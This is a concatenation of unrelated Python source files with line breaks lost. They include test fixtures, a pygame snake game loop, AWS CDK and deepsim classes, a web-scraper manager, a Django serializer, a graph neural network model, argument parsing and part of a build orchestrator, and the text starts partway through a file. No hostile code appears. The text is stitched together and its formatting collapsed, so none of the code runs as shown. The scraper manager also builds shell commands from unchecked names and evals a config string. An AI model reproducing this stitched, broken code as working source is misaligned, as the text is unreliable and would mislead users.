get_parsed_reader if TYPE_CHECKING: from .models import ( TestCodeTable as TestCodeTable_, TestHierachyTable as TestHierachyTable_, ) @pytest.fixture def xlsx_path_func() -> Callable[[str], Path]: def xlsx_path(filename: str) -> Path: xlsx_path = Path("tests", "data", "excels", filename) return ProjectPath.get_subpath_from_project(xlsx_path) return xlsx_path @pytest.fixture def TestHierachyTable() -> Type["TestHierachyTable_"]: # pylint: disable=W0621 from .models import TestHierachyTable as TestHierachyTable__ return TestHierachyTable__ @pytest.fixture def parser(xlsx_path_func: Callable[[str], Path]) -> HierachyParser: # pylint: disable=W0621 return get_parsed_reader("test-code.xlsx", xlsx_path_func) @pytest.fixture def TestCodeTable() -> Type["TestCodeTable_"]: # pylint: disable=W0621 from .models import TestCodeTable as TestCodeTable__ return TestCodeTable__ @pytest.fixture def session() -> "Session": from .models import Session_ session: "Session" = Session_() return session mes32/snakepitsnakepit/game_loop.py import sys import pygame import game_level import game_level_view import save_menu import load_menu from game_over_menu import GameOverMenu from player_stats import PlayerStats class GameLoop(): """ The current game session. Contains the main game loop. """ def __init__(self, screen): player_stats = PlayerStats() level = game_level.GameLevel(screen, player_stats) view = game_level_view.GameLevelView(level, screen) player = level.player view.render() while True: for event in pygame.event.get(): if event.type == pygame.QUIT: sys.exit() elif player.has_died(): menu = GameOverMenu(screen, view) quit = menu.get_choice() if quit: sys.exit() else: level = game_level.GameLevel(screen, player_stats) view = game_level_view.GameLevelView(level, screen) player = level.player view.render() continue elif event.type == pygame.KEYDOWN: if event.key == pygame.K_UP: player.plan_walk(y=-1) elif event.key == pygame.K_DOWN: player.plan_walk(y=1) elif event.key == pygame.K_LEFT: player.plan_walk(x=-1) elif event.key == pygame.K_RIGHT: player.plan_walk(x=1) elif event.key == pygame.K_z: player.plan_walk(0, 0) elif event.key == pygame.K_t: player.teleport(level) elif event.key == pygame.K_s: save_menu.SaveMenu(screen, view, level) elif event.key == pygame.K_l: menu = load_menu.LoadMenu(screen, view, level) loaded_level = menu.run() if loaded_level is not None: level = loaded_level view = game_level_view.GameLevelView(level, screen) player = level.player view.render() continue else: continue level.update() view.render()# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). # You may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from typing import TYPE_CHECKING, cast import aws_cdk.core as core from aws_cdk import aws_lambda from aws_orbit.remote_files.cdk import _lambda_path if TYPE_CHECKING: from aws_orbit.models.context import Context class LambdaBuilder: @staticmethod def get_or_build_construct_request( scope: core.Construct, context: "Context", team_name: str, ) -> aws_lambda.Function: stack = core.Stack.of(cast(core.IConstruct, scope)) lambda_function = cast(aws_lambda.Function, stack.node.try_find_child("construct_request")) if lambda_function is None: lambda_function = aws_lambda.Function( scope=stack, id="construct_request", function_name=f"orbit-{context.name}-{team_name}-k8s-construct-request", code=aws_lambda.Code.asset(_lambda_path("construct_request")), handler="index.handler", runtime=aws_lambda.Runtime.PYTHON_3_6, timeout=core.Duration.seconds(10), ) return lambda_function 0 import json with open("./country_to_code.json") as f: data = json.load(f) dic = {} for i in data: dic[data[i]] = i print(dic) with open("./code_to_country.json","w") as ff: json.dump(dic,ff) # -*- coding: utf-8 -*- ''' @Date: 2020/1/6 @Author: fanyibin @Description: 使用命令管理爬虫 ''' import re from frame_library.logger import get_log_config from seed.seed_manager import SeedManager from config.config_parser import get_config from importlib import import_module from os import popen import argparse parser = argparse.ArgumentParser() parser.add_argument('-s', help='seed: to make start seeds') parser.add_argument('-r', help='run: to run this spider') parser.add_argument('-rs', help='restart: to restart this spider') parser.add_argument('-c', help='clear: to clear all seeds of this spider') parser.add_argument('-cd', help='clear dups: to clear all dups of this spider') parser.add_argument('-v', help='view: to view this spider') parser.add_argument('-k', help='kill: to kill the process for of this spider') parser.add_argument('--runspider', help="Don't use this arg!") args = parser.parse_args() class Manager(object): def __init__(self): self.seed_name = args.s self.run_name = args.r self.clear_name = args.c self.cleardup_name = args.cd self.runspider_name = args.runspider self.view_name = args.v self.kill_name = args.k self.restart_name = args.rs self.name = (self.seed_name or self.run_name or self.clear_name or self.cleardup_name or self.runspider_name or self.view_name or self.kill_name or self.restart_name) self.name_seed = ':'.join([self.name, 'seed']) self.name_dup = ':'.join([self.name, 'dup']) self.log = get_log_config(self.name) self.seedmanager = SeedManager() self.spider_config = get_config('spider_config.ini').get('SPIDERS', self.name) self.python_env = get_config('settings.ini').get('FRAME_SETTINGS', 'PYTHON_ENV') def _spider_conf(self): spider_conf = eval(self.spider_config) _file = spider_conf.get('file') _class = spider_conf.get('class') return _file, _class @property def _spider_inst(self): _file, _class = self._spider_conf() inst = getattr(import_module('spiders.%s' % _file), '%s' % _class) return inst() def _make_seeds(self): start_func = getattr(self._spider_inst, 'start_requests')() for seed in start_func: self.seedmanager.push_seed(self.name_seed, seed) def _run_spider(self): self._spider_inst.run_server() def _run_command(self): if self._check_spider_isalive(): self.log.info('无法启动爬虫,因为<{}>已在后台运行,请使用 {} manager.py -rs {} 重启爬虫。'.format( self.name, self.python_env, self.name)) return popen('nohup {} manager.py --runspider {} >/dev/null 2>&1 &'.format(self.python_env, self.name)) self._view_spider() def _check_spider_isalive(self): if self._get_pid() is not None: return True return False def _clear_seeds(self): self.seedmanager.clear_seeds(self.name_seed) def _clear_dups(self): self.seedmanager.clear_dups(self.name_dup) def _get_pid_str(self, string): pid_str_lst = string.split(self.name) for _str in pid_str_lst: if 'runspider' in _str: return _str.strip() def _get_pid(self): ret = popen('ps -ef | grep {}'.format(self.name)) str_ret = ret.read() if 'runspider' not in str_ret: return None pid_str = self._get_pid_str(str_ret) pid = re.search(r'\w+\s+(\d+)\s+', pid_str).group(1) return pid def _view_spider(self): _pid = self._get_pid() if _pid is None: return self.log.info('<{}>没有在后台运行,PID=None。'.format(self.name)) self.log.info('<{}>正在后台运行,PID={}。'.format(self.name, _pid)) return _pid def _kill_spider(self): _pid = self._get_pid() if _pid is None: return self.log.info('<{}>没有在后台运行,PID=None。'.format(self.name)) popen('kill {}'.format(_pid)) self.log.info('<{}>已停止运行,PID={}。'.format(self.name, _pid)) def _restart_spider(self): self._kill_spider() self.log.info('<{}>准备重启...'.format(self.name)) self._run_command() def run(self): if self.clear_name: self._clear_seeds() if self.cleardup_name: self._clear_dups() if self.seed_name: self._make_seeds() if self.run_name: self._run_command() if self.runspider_name: self._run_spider() if self.view_name: self._view_spider() if self.kill_name: self._kill_spider() if self.restart_name: self._restart_spider() if __name__ == '__main__': manager = Manager() manager.run()################################################################################# # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. # # # # Licensed under the Apache License, Version 2.0 (the "License"). # # You may not use this file except in compliance with the License. # # You may obtain a copy of the License at # # # # http://www.apache.org/licenses/LICENSE-2.0 # # # # Unless required by applicable law or agreed to in writing, software # # distributed under the License is distributed on an "AS IS" BASIS, # # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # # See the License for the specific language governing permissions and # # limitations under the License. # ################################################################################# """A class for visual.""" from typing import Optional, Union from deepsim.core.color import Color from deepsim.core.vector3 import Vector3 from deepsim.core.pose import Pose from deepsim.core.material import Material from deepsim.gazebo.constants import GeometryType from deepsim_msgs.msg import Visual as ROSVisual class Visual: """ Visual class """ def __init__(self, link_name: Optional[str] = None, visual_name: Optional[str] = None, material: Optional[Material] = None, transparency: float = 0.0, visible: bool = True, geometry_type: Union[int, GeometryType] = GeometryType.EMPTY, mesh_geom_filename: Optional[str] = None, mesh_geom_scale: Optional[Vector3] = None, pose: Optional[Pose] = None) -> None: """ Initialize Visual class Args: link_name (Optional[str]): link name visual_name (Optional[str]): visual name material (Optional[Material]): material transparency (float): transparency [0.0 - 1.0] visible (bool): the flag whether visible or not geometry_type (Union[int, GeometryType]): the geometry type mesh_geom_filename (Optional[str]): mesh geometry filename mesh_geom_scale (Optional[Vector3]): the mesh scale in vector3 format. pose (Optional[Pose]): the pose of visual """ self._link_name = link_name self._visual_name = visual_name self._material = material.copy() if material else Material() self._transparency = transparency self._visible = visible self._geometry_type = geometry_type if isinstance(self._geometry_type, int): self._geometry_type = GeometryType(self._geometry_type) self._mesh_geom_filename = mesh_geom_filename self._mesh_geom_scale = mesh_geom_scale.copy() if mesh_geom_scale else Vector3.one() self._pose = pose.copy() if pose else Pose() @property def link_name(self) -> str: """ Returns the link name Returns: str: link name """ return self._link_name @link_name.setter def link_name(self, value: str) -> None: """ Set link name Args: value (str): link name """ self._link_name = value @property def visual_name(self) -> str: """ Returns the visual name Returns: str: visual name """ return self._visual_name @visual_name.setter def visual_name(self, value: str) -> None: """ Set visual name Args: value (str): visual name """ self._visual_name = value @property def material(self) -> Material: """ Returns the copy of material Returns: Material: the copy of material """ return self._material.copy() @material.setter def material(self, value: Material) -> None: """ Set the material Args: value (Material): the material """ self._material = value.copy() @property def transparency(self) -> float: """ Returns the transparency [0.0 - 1.0] - 0.0 is full transparency and 1.0 is opaque. Returns: float: the transparency value """ return self._transparency @transparency.setter def transparency(self, value: float) -> None: """ Set the transparency Args: value (float): the transparency """ self._transparency = value @property def visible(self) -> bool: """ Returns the flag whether visible or not. Returns: bool: the flag whether visible or not. """ return self._visible @visible.setter def visible(self, value: bool) -> None: """ Set the visible Args: value (bool): the visible """ self._visible = value @property def geometry_type(self) -> GeometryType: """ Returns the geometry type Returns: int: the geometry type """ return self._geometry_type @geometry_type.setter def geometry_type(self, value: Union[int, GeometryType]) -> None: """ Set the geometry_type Args: value (GeometryType): the geometry_type """ self._geometry_type = value if isinstance(self._geometry_type, int): self._geometry_type = GeometryType(self._geometry_type) @property def mesh_geom_filename(self) -> str: """ Returns the mesh geometry filename Returns: str: mesh geometry filename """ return self._mesh_geom_filename @mesh_geom_filename.setter def mesh_geom_filename(self, value: str) -> None: """ Set mesh geometry filename Args: value (str): mesh geometry filename """ self._mesh_geom_filename = value @property def mesh_geom_scale(self) -> Vector3: """ Returns the mesh geometry scale in Vector3 Returns: Vector3: the mesh geometry scale in Vector3 """ return self._mesh_geom_scale.copy() @mesh_geom_scale.setter def mesh_geom_scale(self, value: Vector3) -> None: """ Set the mesh geometry scale in Vector3 Args: value (Vector3): the mesh geometry scale in Vector3 """ self._mesh_geom_scale = value.copy() @property def pose(self) -> Pose: """ Returns the pose of the visual Returns: Pose: the pose of the visual """ return self._pose.copy() @pose.setter def pose(self, value: Pose) -> None: """ Set the pose of the visual Args: value (Pose): the pose of the visual """ self._pose = value.copy() def to_ros(self) -> ROSVisual: ros_visual = ROSVisual() ros_visual.link_name = self.link_name ros_visual.visual_name = self.visual_name ros_visual.ambient = self.material.ambient.to_ros() ros_visual.diffuse = self.material.diffuse.to_ros() ros_visual.specular = self.material.specular.to_ros() ros_visual.emissive = self.material.emissive.to_ros() ros_visual.transparency = self.transparency ros_visual.visible = self.visible ros_visual.geometry_type = self.geometry_type.value ros_visual.mesh_geom_filename = self.mesh_geom_filename ros_visual.mesh_geom_scale = self.mesh_geom_scale.to_ros() ros_visual.pose = self._pose.to_ros() return ros_visual @staticmethod def from_ros(value: ROSVisual) -> 'Visual': """ Returns new Visual object created from ROS GetVisualResponse Args: value (deepsim_msgs.msg.ROSVisual): ROS Visual Returns: Pose: new Visual object created from ROS Visual """ return Visual(link_name=value.link_name, visual_name=value.visual_name, material=Material(ambient=Color.from_ros(value.ambient), diffuse=Color.from_ros(value.diffuse), specular=Color.from_ros(value.specular), emissive=Color.from_ros(value.emissive)), transparency=value.transparency, visible=value.visible, geometry_type=value.geometry_type, mesh_geom_filename=value.mesh_geom_filename, mesh_geom_scale=Vector3.from_ros(value.mesh_geom_scale), pose=Pose.from_ros(value.pose)) def copy(self) -> 'Visual': """ Returns a copy. Returns: Visual: the copied visual """ return Visual(link_name=self._link_name, visual_name=self._visual_name, material=self._material, transparency=self._transparency, visible=self._visible, geometry_type=self._geometry_type, mesh_geom_filename=self._mesh_geom_filename, mesh_geom_scale=self._mesh_geom_scale, pose=self._pose) def __eq__(self, other: 'Visual') -> bool: """ Check whether given visual is equal to self. Args: other (Visual): other to compare Returns: bool: True if the differences of all components are within epsilon, Otherwise False. """ return (self._link_name == other._link_name and self._visual_name == other._visual_name and self._material == other._material and self._transparency == other._transparency and self._visible == other._visible and self._geometry_type == other._geometry_type and self._mesh_geom_filename == other._mesh_geom_filename and self._mesh_geom_scale == other._mesh_geom_scale and self._pose == other._pose) def __ne__(self, other: 'Visual') -> bool: """ Inequality of visuals is inequality of any components. Args: other (Visual): other to compare Returns: bool: False if there are the differences of any components, Otherwise True. """ return not self.__eq__(other) def __str__(self) -> str: """ String representation of a visual Returns: str: String representation of a visual """ repr_str = "(" repr_str += "link_name={}".format(repr(self._link_name)) repr_str += ", visual_name={}".format(repr(self._visual_name)) repr_str += ", material={}".format(repr(self._material)) repr_str += ", transparency={}".format(repr(self._transparency)) repr_str += ", visible={}".format(repr(self._visible)) repr_str += ", geometry_type={}".format(repr(self._geometry_type.name)) repr_str += ", mesh_geom_filename={}".format(repr(self._mesh_geom_filename)) repr_str += ", mesh_geom_scale={}".format(repr(self._mesh_geom_scale)) repr_str += ", pose={})".format(repr(self._pose)) return repr_str def __repr__(self) -> str: """ String representation including class Returns: str: String representation including class """ return "Visual" + str(self) # !/usr/bin/env python3 # -*- encoding: utf-8 -*- # @author: condi # @file: serializers.py # @time: 19-2-20 下午4:32 from rest_framework import serializers from .models import Image class SCUImageSerializer(serializers.ModelSerializer): """查增修""" last_open_time = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S', read_only=True) class Meta: model = Image fields = ('id', 'file_name', 'suffix', 'storage_path', 'last_open_time', 'file_size') # Star Wars Asciimation # show, if all is well, an animation of star wars in ASCII, telnet connection # should also work on computer with Python3 # URL: http://docs.micropython.org/en/latest/esp8266/esp8266/tutorial/network_tcp.html#star-wars-asciimation import socket # get addres information of site addr_info = socket.getaddrinfo("towel.blinkenlights.nl", 23) print(addr_info) #debug # get the IP and port addr = addr_info[0][-1] print(addr) #debug # connect to it via socket s = socket.socket() s.connect(addr) # print content/animation in console # use cntrl-C to interrupt while True: data = s.recv(500) print(str(data, 'utf8'), end='') # 2017-0812: seems not to work (anymore). Unknown. ''' Traceback (most recent call last): File "", line 1, in File "starwars.py", line 23, in starwars OSError: [Errno 104] ECONNRESET ''' import os import random from functools import partial import copy import time import numpy as np import torch from dgl import DGLGraph from dgl.nn import pytorch as dgl_layers from torch import optim from torch_geometric import nn as pyg_layers from torch_geometric.utils import to_networkx from .graph_net import GraphNet from .module_utils import init_optimizer def bc(**kwargs): base = { 'in_dropout': 0.5, 'out_dropout': 0.5, 'wd': 0.001, 'activation': 'relu', 'optimizer': 'adam', } base.update(**kwargs) return base SEARCH_SPACE_FLAT = [ bc(conv_class=partial(dgl_layers.TAGConv, k=4), n_layers=1, n_iter=700, lr=0.01, hidden_size=32, wd=0, activation='tanh', optimizer='adam'), # 1, 2, 3 bc(conv_class=partial(pyg_layers.SAGEConv, normalize=True), hidden_size=96, n_layers=2, n_iter=300, lr=0.01, wd=0), # 1 bc(conv_class=partial(dgl_layers.GraphConv), hidden_size=64, n_layers=2, n_iter=300, lr=0.01, wd=0, optimizer='adamw', activation='elu'), # 5, 1 bc(conv_class=partial(pyg_layers.GraphConv, aggr='add'), hidden_size=64, n_layers=1, n_iter=200, lr=0.001), # 2?, 3, 4 bc(conv_class=partial(dgl_layers.SGConv, k=5), hidden_size=96, n_layers=1, n_iter=500, lr=0.01, wd=0, optimizer='adam', activation='softsign'), # 4? ] def fix_seed(seed): random.seed(seed) np.random.seed(seed) torch.manual_seed(seed) torch.cuda.manual_seed_all(seed) torch.backends.cudnn.deterministic = True class PYGModel: def __init__(self, n_classes, conv_class, hidden_size, n_layers, in_dropout, out_dropout, n_iter, wd, lr, optimizer, activation): self.conv_class = conv_class self.hidden_size = hidden_size self.n_layers = n_layers self.device = torch.device('cuda') self.n_iter = n_iter self.n_classes = n_classes self.in_dropout = in_dropout self.out_dropout = out_dropout self.lr = lr self.wd = wd self.optimizer_str = optimizer self.activation = activation self.model = None def init_model(self, data): input_size = data.x.shape[1] self.model = GraphNet( input_size=input_size, n_classes=self.n_classes, n_nodes=len(data.x), n_layers=self.n_layers, conv_class=self.conv_class, n_hidden=self.hidden_size, in_dropout=self.in_dropout, out_dropout=self.out_dropout, activation=self.activation) self.model = self.model.to(self.device) self.optimizer = init_optimizer(self.optimizer_str)(self.model.parameters(), lr=self.lr, weight_decay=self.wd) self.criterion = torch.nn.CrossEntropyLoss() def train(self, data, g, mask, n_iter): self.model.train() st = time.time() for epoch_idx in range(n_iter): self.optimizer.zero_grad() out = self.model(g, data) loss = self.criterion(out[mask], data.y[mask]) loss.backward() self.optimizer.step() if (time.time() - st) > 70: break def predict(self, data, g, mask=None): self.model.eval() with torch.no_grad(): pred = self.model(g, data) if mask is not None: pred = pred[mask] return pred def fit_predict(self, data, g): data = data.to(self.device) g = g.to(self.device) # Train + evaluate score on validation scores = [] preds = [] for train_idx, val_idx in data.cv: self.init_model(data) train_mask = torch.zeros(len(data.x), dtype=torch.bool) train_mask[np.array(data.train_indices)[train_idx]] = 1 val_mask = torch.zeros(len(data.x), dtype=torch.bool) val_mask[np.array(data.train_indices)[val_idx]] = 1 train_mask = train_mask.to(self.device) val_mask = val_mask.to(self.device) self.train(data, g, mask=train_mask, n_iter=self.n_iter) y_val_pred = self.predict(data, g, mask=val_mask).argmax(1) score = (y_val_pred == data.y[val_mask]).sum().cpu().numpy() / len(y_val_pred) scores.append(score) preds.append(torch.nn.functional.softmax(self.predict(data, g, mask=data.test_mask), dim=1)) # for _ in range(3): # self.train(data, g, mask=train_mask+val_mask, n_iter=5) # preds.append(torch.nn.functional.softmax(self.predict(data, g, mask=data.test_mask), dim=1)) score = np.mean(scores) # self.train(data, g, mask=train_mask+val_mask) # self.train(data, g, mask=data.train_mask + data.val_mask) # pred = self.predict(data, g, mask=data.test_mask) # pred = sum(preds) # self.n_iter = 1 # for i in range(5): # self.train(data, g, mask=data.train_mask + data.val_mask) # pred += self.predict(data, g, mask=data.test_mask) # pred /= 6 # t_pred = self.predict(data, mask=None) # t_pred = F.softmax(t_pred, dim=1).cpu().numpy() # test_mask = ~(data.train_mask + data.val_mask).cpu().numpy() # perc = np.percentile(t_pred[test_mask].max(axis=1), 15) # nmask = ((t_pred * test_mask[:, np.newaxis]).max(axis=1) > perc) # nmask = torch.tensor(nmask, dtype=torch.bool).cuda() # data.train_mask += nmask # data.y[test_mask] = torch.tensor(t_pred[test_mask].argmax(axis=1), dtype=torch.long).cuda() # self.n_iter = 5 # self.train(data, mask=data.train_mask+data.val_mask) # pred1 = self.predict(data, mask=data.test_mask).cpu().numpy() # pred = (pred + pred1) / 3 pred = torch.stack(preds).cpu().numpy() return pred, score def create_factory_method(n_classes): def create_model(**config): return PYGModel( n_classes, conv_class=config['conv_class'], hidden_size=config['hidden_size'], n_layers=config['n_layers'], in_dropout=config['in_dropout'], out_dropout=config['out_dropout'], n_iter=config['n_iter'], wd=config['wd'], lr=config['lr'], activation=config['activation'], optimizer=config['optimizer'], ) return create_model tomhosking/torchseq import argparse def parse_args(): parser = argparse.ArgumentParser( description="TorchSeq", ) parser.add_argument("-V", "--version", action="store_true", help="Display version") # Config stuff parser.add_argument( "-c", "--config", type=str, metavar="CONFIG", default="./configs/default.json", help="Path to config file" ) parser.add_argument( "-p", "--patch", type=str, metavar="PATCH", default=None, help="Config mask(s) to overwrite main config with", action="append", ) # Actions parser.add_argument("--train", action="store_true", help="Run training?") parser.add_argument("--validate", action="store_true", help="Run eval on dev?") parser.add_argument("--validate_train", action="store_true", help="Run eval on train?") parser.add_argument("--test", action="store_true", help="Run eval on test?") parser.add_argument("--silent", action="store_true", help="Disable logging") parser.add_argument( "--reload_after_train", action="store_true", help="Reload model after training to do a validation run" ) # Model loading parser.add_argument("--load_chkpt", type=str, metavar="CHECKPOINT", default=None, help="Path to checkpoint file") parser.add_argument("-l", "--load", type=str, metavar="MODEL", default=None, help="Path to model folder") parser.add_argument("--nocache", action="store_true", help="Disable loading from an old cache") # Paths parser.add_argument("-d", "--data_path", type=str, metavar="DATA", default="./data/", help="Path to data sources") parser.add_argument( "-o", "--output_path", type=str, metavar="OUTPUT", default="./runs/", help="Path to output folder" ) # Runtime parser.add_argument("--cpu", action="store_true", help="Disable CUDA") parser.add_argument("--debug", action="store_true", help="Enable debug mode") parser.add_argument("--profile", action="store_true", help="Enable profiler") args = parser.parse_args() return args #========================================================================= # build_orchestrator.py #========================================================================= # Backend that generates build files from a graph # # Author : # Date : June 11, 2019 # import os import re import shutil from mflowgen.assertions.assertion_helpers import dump_assertion_check_scripts from mflowgen.utils import get_top_dir, get_files_in_dir class BuildOrchestrator: def __init__( s, graph, backend_writer_cls ): s.g = graph s.w = backend_writer_cls() # The 'build' method analyzes the user's step dependency graph in # order to populate the rules and high-level dependencies (e.g., this # step depends on that step) of the build system graph s.build_system_rules = {} s.build_system_deps = {} # Build order s.order = [] # Metadata for each build directory s.build_dirs = {} s.build_ids = {} s.step_dirs = {} # Hidden metadata directory that saves parameterized YAMLs and # commands for each step s.metadata_dir = '.mflowgen' if os.path.exists( s.metadata_dir ): shutil.rmtree( s.metadata_dir ) os.mkdir( s.metadata_dir ) # Names for the generated run and debug scripts for each step s.mflowgen_run = 'mflowgen-run' s.mflowgen_debug = 'mflowgen-debug' s.mflowgen_precond = 'mflowgen-check-preconditions.py' s.mflowgen_postcond = 'mflowgen-check-postconditions.py' #----------------------------------------------------------------------- # dump_yamls #----------------------------------------------------------------------- # For the parameter system, we will dump each step's (parameterized) # configuration data into a hidden metadata directory. # def dump_yamls( s, step_name, build_dir ): inner_dir = s.metadata_dir + '/' + build_dir if not os.path.exists( inner_dir ): os.mkdir( inner_dir ) step = s.g.get_step( step_name ) step.dump_yaml( inner_dir ) #----------------------------------------------------------------------- # dump_commands #----------------------------------------------------------------------- # Each step's command script goes into the hidden metadata directory. # When executing a step, we just copy the commands to the build dir and # run it there. This also makes it easy for the user to run the step in # isolation for debug purposes. # def dump_commands( s, commands, step_name, build_dir ): # Directories inner_dir = s.metadata_dir + '/' + build_dir if not os.path.exists( inner_dir ): os.mkdir( inner_dir ) # Generate the command script gen = os.path.abspath( __file__ ).rstrip('c') with open( inner_dir + '/' + s.mflowgen_run, 'w' ) as fd: # Shebang # # - Enforce bash since we will be exporting # - Use error propagation flags so that builds will stop for errors fd.write( '#! /usr/bin/env bash\n' ) fd.write( 'set -euo pipefail\n' ) # Header fd.write( '#' + '='*73 + '\n' ) fd.write( '# ' + s.mflowgen_run + '\n' ) fd.write( '#' + '='*73 + '\n' ) fd.write( '# Generator : ' + gen + '\n' ) fd.write( '\n' ) # Pre # # - Starting timestamp # - Dump all parameters into the script # params = s.g.get_step( step_name ).params() params_str = 'export {}={}' params_commands = [] for k, v in params.items(): if type(v) is list: # can't export a list in bash, so need to serialize it serialized_value = ",".join(v) params_commands.append( params_str.format(k,serialized_value) ) else: params_commands.append( params_str.format(k,v) ) pre = [ 'rm -f .time_end', # clear end timestamp 'date +%Y-%m%d-%H%M-%S > .time_start', # start timestamp 'MFLOWGEN_STEP_HOME=$PWD', # save build directory ] pre = pre + params_commands fd.write( '# Pre\n' ) fd.write( '\n' ) for c in pre: fd.write( c ) fd.write( '\n' ) fd.write( '\n' ) # Commands fd.write( '# Commands\n' ) fd.write( '\n' ) for c in commands: fd.write( c ) fd.write( '\n' ) fd.write( '\n' ) # Post # # - Ending timestamp # post = [ 'cd $MFLOWGEN_STEP_HOME', # return to known location 'date +%Y-%m%d-%H%M-%S > .time_end', # end timestamp ] fd.write( '# Post\n' ) fd.write( '\n' ) for c in post: fd.write( c ) fd.write( '\n' ) fd.write( '\n' ) #----------------------------------------------------------------------- # dump_debug_commands #----------------------------------------------------------------------- # Each step's debug command script goes into the hidden metadata # directory. When executing debug for a step, we just copy the commands # to the build dir and run it there. This also makes it easy for the # user to launch debug on their own. # def dump_debug_commands( s, commands, step_name, build_dir ): # Directories inner_dir = s.metadata_dir + '/' + build_dir if not os.path.exists( inner_dir ): os.mkdir( inner_dir ) # Generate the debug command script gen = os.path.abspath( __file__ ).rstrip('c') with open( inner_dir + '/' + s.mflowgen_debug, 'w' ) as fd: # Shebang # # - Enforce bash since we will be exporting # - Use error propagation flags so the build will stop for errors fd.write( '#! /usr/bin/env bash\n' ) fd.write( 'set -euo pipefail\n' ) # Header fd.write( '#' + '='*73 + '\n' ) fd.write( '# ' + s.mflowgen_debug + '\n' ) fd.write( '#' + '='*73 + '\n' ) fd.write( '# Generator : ' + gen + '\n' ) fd.write( '\n' ) # Params params = s.g.get_step( step_name ).params() params_str = 'export {}={}' params_commands = [] for k, v in params.items(): if type(v) is list: # can't export a list in bash, so need to serialize it serialized_value = ",".join(v) params_commands.append( params_str.format(k,serialized_value) ) else: params_commands.append( params_str.format(k,v) ) fd.write( '# Pre\n' ) fd.write( '\n' ) for c in params_commands: fd.write( c ) fd.write( '\n' ) fd.write( '\n' ) # Commands fd.write( '# Debug\n' ) fd.write( '\n' ) for c in commands: fd.write( c ) fd.write( '\n' ) fd.write( '\n' ) #----------------------------------------------------------------------- # dump_graphviz #----------------------------------------------------------------------- # Dump the graphviz dot file that visualizes the user-defined graph into # the hidden metadata directory. # # Note that this is not the build system graph, which is likely too # detailed to understand much from. # def dump_graphviz( s ): s.g.plot( dot_f = s.metadata_dir + '/graph.dot' ) #----------------------------------------------------------------------- # set_unique_build_ids #----------------------------------------------------------------------- # set_unique_build_ids # # Builds a dictionary that numbers the steps with unique IDs. # # For example: # # s.build_ids = { # 'step-foo': '1', # 'step-bar': '2', # 'step-baz': '3', # } # # Existing build directories claim their existing build ID with highest # priority. Remaining steps are assigned a build ID in topological order # counting up from 0 unless the ID is already claimed by an existing # step. # def set_unique_build_ids( s ): existing_build_ids = s._find_existing_build_ids() # Print a help message if existing_build_ids: print( ''' Found the following existing build directories. Their numbering will be preserved in the new graph, as will their build status (assuming the same graph connectivity). This prevents unnecessary rebuilds due solely to different numberings. This means that an existing step N will remain step N. For a completely clean build, run the "clean-all" target.\n''' ) for step_name, build_id in sorted( existing_build_ids.items(), \ key = lambda x: int(x[1]) ): print( '- {: >3} : {}'.format( build_id , build_id+'-'+step_name ) ) print() # Any existing steps get first claim on their existing build ids s.build_ids = existing_build_ids # Any remaining steps get a build id in topological sort order (while # skipping any already-claimed build ids) i = 0 for step_name in s.order: # Skip steps that have already been assigned if step_name in s.build_ids.keys(): continue # Find an unclaimed build id while str(i) in s.build_ids.values(): i += 1 s.build_ids[ step_name ] = str(i) i += 1 # _find_existing_build_ids # # Search for existing build directories of the form "4-step-foo". The # step name would be "step-foo" and this function would return the # following build ID dictionary: # # existing_build_ids = { 'step-foo': '4' } # def _find_existing_build_ids( s ): existing_build_ids = {} for dir_name in os.listdir('.'): # search the current directory if os.path.isdir( dir_name ): m = re.match( r'(\d+)-(.*)', dir_name ) if m: build_id = m.group(1) step_name = m.group(2) if step_name in s.order: # only save if also in the new graph if build_id not in existing_build_ids.values(): # keep unique existing_build_ids[ step_name ] = build_id return existing_build_ids #----------------------------------------------------------------------- # Setup #----------------------------------------------------------------------- def setup( s ): # Check the validity of this graph (no cycles) #assert s.g.check_cycles() == None # Expand parameters in the graph s.g.expand_params() # Determine build order s.order = s.g.topological_sort() # Determine unique build IDs and build directories s.set_unique_build_ids() s.build_dirs = { step_name: build_id + '-' + step_name \ for step_name, build_id in s.build_ids.items() } # Get step directories for step_name in s.order: s.step_dirs[ step_name ] = s.g.get_step( step_name ).get_dir() # Dump metadata about build vars and local connectivity to all steps s.g.dump_metadata_to_steps( build_dirs = s.build_dirs, build_ids = s.build_ids ) # Dump parameterized YAMLs for each step to the metadata directory for step_name, build_dir in s.build_dirs.items(): s.dump_yamls( step_name, build_dir ) # Dump commands for each step to the metadata directory for step_name, build_dir in s.build_dirs.items(): step = s.g.get_step( step_name ) step_commands = step.get_commands() if step_commands: s.dump_commands( step_commands, step_name, build_dir ) # Dump debug commands for each step to the metadata directory for step_name, build_dir in s.build_dirs.items(): step = s.g.get_step( step_name ) debug_commands = step.get_debug_commands() if debug_commands: s.dump_debug_commands( debug_commands, step_name, build_dir ) # Dump assertion check scripts for each step to the metadata directory for step_name, build_dir in s.build_dirs.items(): inner_dir = s.metadata_dir + '/' + build_dir if not os.path.exists( inner_dir ): os.mkdir( inner_dir ) dump_assertion_check_scripts( step_name, inner_dir ) # Dump graphviz dot file to the metadata directory s.dump_graphviz() #----------------------------------------------------------------------- # build #----------------------------------------------------------------------- # Turn the user-level step dependency graph into a build system # dependency graph and use the backend writer interface to generate the # build file. For each step in the graph, we create the following # targets: # # - directory -- Create build dir by copying the step template # - collect-inputs -- Collect dependencies into the 'inputs/' dir # - execute -- Run any commands for the step # - collect-outputs -- Collect tagged outputs into the 'outputs/' dir # - alias -- Define an alias for this step (i.e., step name) # # They are arranged with the following dependencies: # # +-----------+ # | directory | # +-----------+ # | | # | v # | +----------------+ # | | collect-inputs | # | +----------------+ # | | # v v # +---------+ # | execute | # +---------+ # | | # | +----------------+ # | | | # | v | # | +-----------------+ | # | | collect-outputs | | # | +-----------------+ | # | | | | # | | v v # | | +-----------------+ # | | | post-conditions | # | | +-----------------+ # | | | # v v v # +-------------------------+ # | alias | # +-------------------------+ # # These two extra edges allow steps to run even if they do not have any # inputs or outputs (e.g., analysis-only steps). # # - 'directory' -> 'execute' # - 'execute' -> 'alias' # 